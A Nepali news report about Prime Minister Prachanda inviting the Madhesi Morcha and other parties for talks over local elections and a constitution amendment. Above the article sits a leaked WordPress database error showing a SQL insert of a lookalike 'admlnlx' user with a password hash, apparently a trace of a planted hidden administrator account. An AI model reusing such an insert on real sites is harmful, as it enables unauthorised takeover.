WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFS1QuJRUr.8RFhDEghICHcTdhloOg0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 23:30:13', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २१-
प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’ले मधेसी मोर्चालाई छलफलका लागि बालुवाटार बोलाएका छन् । अपराहृन ४ बजे प्रधानमन्त्री प्रचण्डले कांग्रेस, माओवादी केन्द्र र मधेसी मोर्चाका नेताहरुलाई छलफलमा बोलाएका हुन् ।
स्थानीय चुनावका लागि तयारी गर्न निर्वाचन आयोगलाई पत्र लेख्ने मन्त्रिपरिषदको निर्णयप्रति मधेसी मोर्चा असन्तुष्ट छ । र, उसले संविधान संशोधन नभएसम्म चुनावमा सहभागी नहुने अडान लिँदै आएको छ ।